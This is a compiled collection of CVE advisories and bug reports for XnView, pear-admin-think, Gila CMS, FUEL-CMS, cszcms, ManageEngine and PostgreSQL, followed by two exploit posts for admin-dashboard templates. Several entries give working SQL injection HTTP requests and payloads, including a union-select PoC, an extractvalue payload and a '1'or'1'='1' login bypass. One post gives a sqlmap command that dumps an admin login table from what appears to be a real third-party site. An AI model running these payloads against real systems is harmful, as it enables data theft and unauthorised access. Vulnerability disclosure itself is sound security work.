Buffer Overflow vulnerability in XNView version 2.49.3, allows local attackers to execute arbitrary code via crafted TIFF file.

Dear user,

XnView 2.49.4 for Windows is available. Versions are available on the normal XnView Download page.

Please note that the XnView Download page offers packages with German/French Setup and German/French Online help.

Direct links to the English Standard version are:  
http://download.xnview.com/XnView-win.exe (English Setup, Multi language)  
http://download.xnview.com/XnView-win.zip (ZIP file, Multi language)

XnView Shell Extension 32bits:  
http://download.xnview.com/XnShellEx.exe  
http://download.xnview.com/XnShellEx.zip

XnView Shell Extension 64bits:  
http://download.xnview.com/XnShellEx64.exe  
http://download.xnview.com/XnShellEx64.zip

SHA256:  
XnView-win.exe: 030E3E45C51A349A3417B52AD6F6547267F1AA6E86BF03BB13E49341AB9FAEB8  
XnView-win.zip: 9E936FB7CD699019A2D1ADF795D6BB078A08686D95ACA0BEA482E0ECE5C72902  
XnView-win-full.exe: 31E13FE27894610D27167ABB0503C6B109E00169D6F3E291BE6661D27953E1C6  
XnView-win-full.zip: 646DE249CEB6E9C1736BC34217C36E720FD7E2FA25468B271A6DEC18707D4E3E  
XnView-win-small.exe: 57E5DF33083C3F440CFA7E44ABE4403724679EEC7A1E57018A5B81A1748557FB  
XnView-win-small.zip: 15DC199567011B41B616BB38DFF31771A9D3E65F1517FC2BEE2068DD69B479FE

\_\_\_\_ 2.49.4 Changelog

\* Ghostscript 9.53.x  
\* GPS & file date - viewtopic.php?f=56&t=40971  
\* TIFF Security vulnerability (Thanks to Michael Heinzl)  
\* NConvert: -levels2 - viewtopic.php?f=57&t=40490  
\* NConvert: -resize supports cm/mm/inches  
\* NConvert: -autodeskew fixed  
\* NConvert: -noholder to disable %$ chars - viewtopic.php?f=57&t=40820

\_\_\_\_ 2.49.3 Changelog

\* Convert 16 to 256 colors - viewtopic.php?f=36&t=39421  
\* Disable ESC to close tabs - viewtopic.php?f=35&t=17078  
\[General\] EscToCloseView=0  
\* Select file from search results & switching mode - viewtopic.php?f=34&t=40063  
\* Title empty when recurse - viewtopic.php?f=36&t=39979  
\* Resize - viewtopic.php?f=35&t=40248  
\* Slideshow: Order of files - viewtopic.php?f=56&t=40087  
\* Fortis Mag fix  
\* NConvert: -wmsize watermark percent size - viewtopic.php?f=57&t=38754  
\* NConvert: canvas size in inches/cm/mm - viewtopic.php?f=57&t=39361  
\* NConvert: replace\_color - viewtopic.php?f=57&t=39769  
\* NConvert: -temperature added

\_\_\_\_ 2.49.2 Changelog

\* Problem with Ghostscript 9.50  
\* PDF font problem - viewtopic.php?f=36&t=39662  
\* CR3 - viewtopic.php?f=35&t=39478  
\* .sld must use 'Recurse' setting - viewtopic.php?f=35&t=39330  
\* GIF loop - viewtopic.php?f=36&t=31689  
\* PAM CMYK

\_\_\_\_ 2.49.1 Changelog

\* TIFF 16bits greyscale

\_\_\_\_ 2.49 Changelog

\* SQLite 3.29.0  
\* NConvert: greater\_than/less\_than condition - viewtopic.php?f=57&t=39147  
\* PSD: Error when writing metadata - viewtopic.php?f=57&t=39137  
\* Export - Problem with RGBA - viewtopic.php?f=36&t=39044  
\* Capture - viewtopic.php?f=36&t=38934  
\* Left/Right F11 to open fullscreen on Left/Right monitor  
\* Create multi file & folder with '.' - viewtopic.php?f=36&t=39008  
\* # to comment line in .sld file  
\* Multipage create: Check if output filename exists  
\* Slideshow crash when using animated GIF - viewtopic.php?f=36&t=38902  
\* XIM format import added  
\* Change timestamp must not use 12h format - viewtopic.php?f=36&t=38702  
\* GIF not played correctly in Slideshow - viewtopic.php?f=34&t=38303  
\* CVE - https://github.com/apriorit/pentesting/ ... ugs/xnview  
\* NConvert: -unsharp  
\* NConvert: -exposure - viewtopic.php?f=57&t=39136  
\* NConvert: -colorize h l s  
\* NConvert: Remove EXIF orientation -exif\_rotation - viewtopic.php?f=57&t=38648  
\* \[Rename\]/TemplateStart, position of number in template - viewtopic.php?f=34&t=38568  
\* CVE-2019-12151  
\* ShellEx: 'Convert...' & input fields

\_\_\_\_ 2.48 Changelog

\* RGB inverted when printing 8bits cmap picture from browser  
\* WebP 32bits  
\* PDF Multipage create - viewtopic.php?f=35&t=38030

\_\_\_\_ 2.47 Changelog

XCF 2.10  
ICNS with JPEG2000 icon  
GIF loop & Quick slideshow - viewtopic.php?f=36&t=31689  
Problem with local charset for image description EXIF field  
\[Start\]/BugBlueLine=1 to remove the bug of blue line  
PDF output without font info - viewtopic.php?f=35&t=38030  
Space must not show tagbox if not enabled  
NConvert: -no\_auto\_rotate - viewtopic.php?f=57&t=38239  
NConvert: -autocrop with position  
NConvert: add -lower to lower case output filename  
NConvert: Bug when output filename contains a numeric enumerator - viewtopic.php?f=57&t=38014

\_\_\_\_ 2.46 Changelog

JPEG2000 YCC - viewtopic.php?f=35&t=37806  
Bad loading for ARW - viewtopic.php?f=36&t=37683  
TIFF with JPEG compression - viewtopic.php?f=35&t=37585  
Adjust dialog clipped - viewtopic.php?f=36&t=32011  
PDF version 1.4 output  
Sqlite 2.24.0  
RLE & ICO vulnerabilities Cody Sixteen from STM Solutions  
NConvert: stdout problem on windows - viewtopic.php?f=57&t=37810

\_\_\_\_ 2.45 Changelog

License written in HKCU  
Support HPI with transparency  
Shows dots under certain conditions - viewtopic.php?f=36&t=37447  
Resize - viewtopic.php?f=36&t=37451  
Blue bar - viewtopic.php?f=36&t=36278  
Resize dialog crash with ^^ - viewtopic.php?f=36&t=36644  
Parameters & External program - viewtopic.php?f=35&t=15465

\_\_\_\_ 2.44 Changelog

Monitor power off during slideshow  
Color profile not used Browser>Print - viewtopic.php?f=36&t=36833  
\-filelist doesn't work anymore  
Tile child window - viewtopic.php?f=56&t=36527  
Strange colors on grey image - viewtopic.php?f=35&t=36485  
UTF8 Exif Image Description

\_\_\_\_ 2.43 Changelog

Better HEIF support - http://www.xnview.com/download/plugins/heif\_x32.zip  
Unwanted file types shown in Viewer - viewtopic.php?f=36&t=35484  
FileListUseExt=1  
Alpha glitch - viewtopic.php?f=36&t=36454  
Folder browsing via command line - viewtopic.php?f=36&t=36434  
Lossless crop corruption - viewtopic.php?f=36&t=36378

\_\_\_\_ 2.42 Changelog

HEIF support - Extract http://www.xnview.com/download/plugins/heif\_x32.zip in Plugins folder

\_\_\_\_ 2.41 Changelog

Basic support for unicode filename  
2Gb limitation on 64bits OS - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35165  
Displaying RGBA image without use alpha - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35809  
Print TIFF with orientation flag in browser - http://newsgroup.xnview.com/viewtopic.php?f=36&t=36197  
GIF loop not saved in .sld - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35991  
Clip support - http://newsgroup.xnview.com/viewtopic.php?f=34&t=28554  
Slideshow crash on RAW files - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34632  
TIF > 2GB & multipage - http://newsgroup.xnview.com/viewtopic.php?f=79&t=35056  
RGBA printing  
Thumbnails upscaling - http://newsgroup.xnview.com/viewtopic.php?f=35&t=36090  
NConvert: -keepdocsize fixed  
NConvert: -shadow - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36163  
NConvert: -align - http://newsgroup.xnview.com/viewtopic.php?f=57&t=36164

\_\_\_\_ 2.40 Changelog

CMYK image default color profile - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31685  
http://newsgroup.xnview.com/viewtopic.php?f=35&t=28839  
RGBA resize (bilinear) - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33425  
http://newsgroup.xnview.com/viewtopic.php?t=29238  
http://newsgroup.xnview.com/viewtopic.php?t=34493  
Ctrl+RMB to copy color - http://newsgroup.xnview.com/viewtopic.php?p=141793  
Capture rectangle on second monitor - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32892  
Print 50+ via command line - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35350  
Filelist to print - http://newsgroup.xnview.com/viewtopic.php?f=34&t=35378  
LIBPNG 1.6.29  
SQLite 3.18.0  
ZLIB 1.2.11  
LCMS 2.8  
BMP 2+10+10+10 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32577  
Category removed if delete file - http://newsgroup.xnview.com/viewtopic.p ... 2&start=15  
Category moved with Cut/Paste  
8BF & undo - http://newsgroup.xnview.com/viewtopic.php?f=36&t=34508  
'Purge Now' - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32667  
OpenEXR updated - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33039  
Resize gamma correction - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33273  
Change timestamp & DST - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33483  
Selection + Tab - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33983  
GIF loop - http://newsgroup.xnview.com/viewtopic.php?f=35&t=34036  
PAM format - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35132  
JPEG 2000 - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35277  
Maximize on first monitor - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32343  
Resize default size - http://newsgroup.xnview.com/viewtopic.php?f=34&t=33694  
PEF for thumbnail's folder - http://newsgroup.xnview.com/viewtopic.php?f=35&t=35363  
Cancel removed from Setup wizard - http://newsgroup.xnview.com/viewtopic.php?f=34&t=32958  
Previous/Next file & RecognizeByExt == false - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33127  
Next/Previous & video - http://newsgroup.xnview.com/viewtopic.php?f=36&t=35182  
Better dialog for update - http://newsgroup.xnview.com/viewtopic.php?f=34&t=19950  
WebP plugin updated  
OpenJPEG2000 updated  
RIOT addon updated  
PNGOUT updated  
X3F with only embedded JPEG  
NConvert: text with -text\_rotation - http://newsgroup.xnview.com/viewtopic.php?f=57&t=35441  
NConvert: -text\_border added

\_\_\_\_ 2.39 Changelog

no IPTC fields in tooltip/info  
Thumbnail for blend file

\_\_\_\_ 2.38 Changelog

Sort by exif - http://newsgroup.xnview.com/viewtopic.php?f=36&t=32387  
Zooming instead file navigation - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33917

\_\_\_\_ 2.37 Changelog

Better HiDPI support  
Change timestamp and video  
GPS direction - http://newsgroup.xnview.com/viewtopic.php?f=35&t=33587  
Right click (make selection) and delete - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33700  
NConvert: Multipage extract - http://newsgroup.xnview.com/viewtopic.php?f=57&t=33879

\_\_\_\_ 2.36 Changelog

FLIF format added  
SVG support via rsvg-convert.exe - http://newsgroup.xnview.com/viewtopic.php?f=34&t=31748  
Search similar & extension - http://newsgroup.xnview.com/viewtopic.php?f=56&t=32840  
Multipage save doesn't use read settings  
PCT crash - http://newsgroup.xnview.com/viewtopic.php?f=36&t=33025  
NConvert: -t start step for number in output name

\_\_\_\_ 2.35 Changelog

#THUMB\_WIDTH\_MAX# & #THUMB\_HEIGHT\_MAX# - http://newsgroup.xnview.com/viewtopic.php?f=34&t=30652  
JPEGXR  
Backspace not working in fullscreen  
LibPNG 1.6.20  
ZIPPack Addon - http://newsgroup.xnview.com/viewtopic.php?f=35&t=31563

Pierre.

CVE-2021-28427: XnView 2.49.4 - XnView Software

SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.

pear-admin-think V2.1.2 has a sql injection vulnerability

sql injection vulnerability exists in pear-admin-think V2.1.2  
This vulnerability allows remote attackers to obtain user sensitive data and even command execution

url:/admin.php/admin.crud/list/name/admin\_admin?page=1&limit=10  
Vulnerability file:app/admin/controller/admin/Crud.php

        public function list($name)
        {
            $sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
            $this->jsonApi('', 0, $sql);
        }
    

Vulnerability exploitation:  
1.Log in backstage  
2.Curd:  
  

poc:

    GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
    Host: www.padmin.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://www.padmin.com/admin.php/admin.crud/index
    Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1

CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com

Cross Site Scripting (XSS) vulnerability in adm_user parameter in Gila CMS version 1.11.3, allows remote attackers to execute arbitrary code during the Gila CMS installation.

**XSS on Gila CMS Installation**

**Gila CMS version 1.11.3**

1: Admin Username

<input name="adm_user" placeholder="Your Name" required="">

adm\_user

/install/install.sql.php

    $_user=$_POST['adm_user'];
    $_email=$_POST['adm_email'];
    $_pass=password_hash($_POST['adm_pass'], PASSWORD_BCRYPT);
    
    $link->query("INSERT INTO userrole(id,userrole) VALUES(1,'Admin');");
    $link->query("INSERT INTO user(id,username,email,pass,active,reset_code) VALUES(1,'$_user','$_email','$_pass',1,'');");
    

2:Login in admin pane

XSS

Visit the website

3:Reference

https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)

CVE-2020-20523: XSS on Gila CMS Installation · Issue #41 · GilaCMS/gila

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items.

Parameter Name:col  
Parameter Type: GET  
Attack Pattern: extractvalue(1,concat(char(126),(select/\*\*/current\_user())))

    GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1/fuel/pages
    Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D

CVE-2020-24950: Vulnerability -  SQL Injection · Issue #562 · daylightstudio/FUEL-CMS

SQL Injection vulnerability in cskaza cszcms version 1.2.9, allows attackers to gain sensitive information via pm_sendmail parameter in csz_model.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-36136: Bug Report: SQL injection vulnerability · Issue #26 · cskaza/cszcms

IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.

**CVE-2023-39417****Extension script @substitutions@ within quoting allow SQL injection**

An extension script is vulnerable if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). No bundled extension is vulnerable. Vulnerable uses do appear in a documentation example and in non-bundled extensions. Hence, the attack prerequisite is an administrator having installed files of a vulnerable, trusted, non-bundled extension. Subject to that prerequisite, this enables an attacker having database-level CREATE privilege to execute arbitrary code as the bootstrap superuser. PostgreSQL will block this attack in the core server, so there's no need to modify individual extensions.

The PostgreSQL project thanks Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg for reporting this problem.

**Version Information**

Affected Version

Fixed In

Fix Published

15

15.4

2023-08-10

14

14.9

2023-08-10

13

13.12

2023-08-10

12

12.16

2023-08-10

11

11.21

2023-08-10

For more information about PostgreSQL versioning, please visit the versioning page.

**CVSS 3.0**

Overall Score

**7.5**

Component

core server

Vector

AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Reporting Security Vulnerabilities**

If you wish to report a new security vulnerability in PostgreSQL, please send an email to security@postgresql.org.

For reporting non-security bugs, please see the Report a Bug page.

CVE-2023-39417: Extension script @substitutions@ within quoting allow SQL injection

A vulnerability was found in PostgreSQL with the use of the MERGE command, which fails to test new rows against row security policies defined for UPDATE and SELECT. If UPDATE and SELECT policies forbid some rows that INSERT policies do not forbid, a user could store such rows.

CVE-2023-39418

FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#sql